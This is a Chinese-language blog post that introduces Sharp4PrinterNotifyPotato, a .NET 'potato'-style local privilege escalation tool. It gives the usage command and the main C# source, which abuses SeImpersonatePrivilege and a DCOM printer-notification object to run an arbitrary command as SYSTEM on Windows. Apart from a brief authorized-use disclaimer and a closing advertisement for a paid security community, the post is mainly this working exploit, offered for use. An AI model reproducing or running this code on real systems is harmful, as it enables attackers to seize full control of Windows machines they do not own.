.NET 一款通过DCOM实现系统提权的工具

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4PrinterNotifyPotato 利用了 Windows 中的 DCOM 服务对象和打印通知服务中的权限配置漏洞,通过 SeImpersonatePrivilege 权限进行攻击,从而实现本地权限提升。

03使用方法

首先需要将源码编译成可执行文件Sharp4PrinterNotifyPotato ,运行时传递要执行的命令作为参

数,基本用法如下所示。

Sharp4PrinterNotifyPotato.exe "whoami /all"

工具执行后,当前用户会尝试以 SYSTEM 权限运行传入的命令,并输出结果。具体如下图所示。

04编码实现

以下是 Sharp4PrinterNotifyPotato 的主要功能实现代码,通过初始化COM和模拟登录用户以及创建DCOM对象完成权限提升,具体代码如下所示。

private unsafe static void Main(string[] args)
{
    try
    {
        NativeMethods.CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, 0, 3, IntPtr.Zero, 64, IntPtr.Zero);

        LUID_AND_ATTRIBUTES[] array = new LUID_AND_ATTRIBUTES[1];
        using (WindowsIdentity current = WindowsIdentity.GetCurrent())
        {
            Console.WriteLine("[+] Current user: " + current.Name);
            NativeMethods.LookupPrivilegeValue(null, "SeImpersonatePrivilege", out array[0].Luid);

            TOKEN_PRIVILEGES structure = default(TOKEN_PRIVILEGES);
            structure.PrivilegeCount = 1U;
            structure.Privileges = array;
            array[0].Attributes = 2U;

            if (!NativeMethods.AdjustTokenPrivileges(current.Token, false, ref structure, Marshal.SizeOf<TOKEN_PRIVILEGES>(structure), IntPtr.Zero, IntPtr.Zero) || Marshal.GetLastWin32Error() != 0)
            {
                Console.WriteLine("[x] SeImpersonatePrivilege not held.");
                return;
            }
        }

        Guid clsid = new Guid("{854A20FB-2D44-457D-992F-EF13785D2B51}");
        IntPtr zero = IntPtr.Zero;

        if (!NativeMethods.LogonUser("X", "X", "X", 9, 3, ref zero) || !NativeMethods.ImpersonateLoggedOnUser(zero))
        {
            Console.WriteLine("[x] logon as interactive error.");
        }
        else
        {
            object obj = null;
            int num = NativeMethods.CoCreateInstance(clsid, null, 4, new Guid("00000000-0000-0000-C000-000000000046"), out obj);

            if (num != 0)
            {
                Console.WriteLine("[x] CoCreateInstance fail with HRESULT: 0x" + num.ToString("x"));
            }
            else
            {
                IConnectionPointContainer connectionPointContainer = obj as IConnectionPointContainer;
                IEnumConnectionPoints enumConnectionPoints;
                connectionPointContainer.EnumConnectionPoints(out enumConnectionPoints);

                int celt = 1;
                int num2 = 0;
                IConnectionPoint[] array2 = new IConnectionPoint[1];
                num = enumConnectionPoints.Next(celt, array2, (IntPtr)((void*)(&num2)));
                CustomQIHolder pUnkSink = new CustomQIHolder(args[0]);

                while (array2[0] == null)
                {
                    num = enumConnectionPoints.Next(celt, array2, (IntPtr)((void*)(&num2)));
                    if (num != 0)
                    {
                        break;
                    }
                }

                try
                {
                    array2[0].Advise(pUnkSink, out num2);
                }
                catch
                {
                }
            }
        }
    }
    catch (Exception arg)
    {
        Console.WriteLine("[x] " + arg);
    }
}

Sharp4PrinterNotifyPotato 工具通过初始化 COM 安全性设置,确保当前用户拥有 SeImpersonatePrivilege 权限,并通过模拟一个交互式登录用户,创建一个 DCOM 对象实例,获取 IConnectionPointContainer 接口,并枚举 DCOM 对象的连接点。

随后,工具注册一个自定义事件接收器,以触发权限提升操作,最终以 SYSTEM 权限执行传入的命令。此过程通过调用一系列 Windows API 函数实现。

  05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值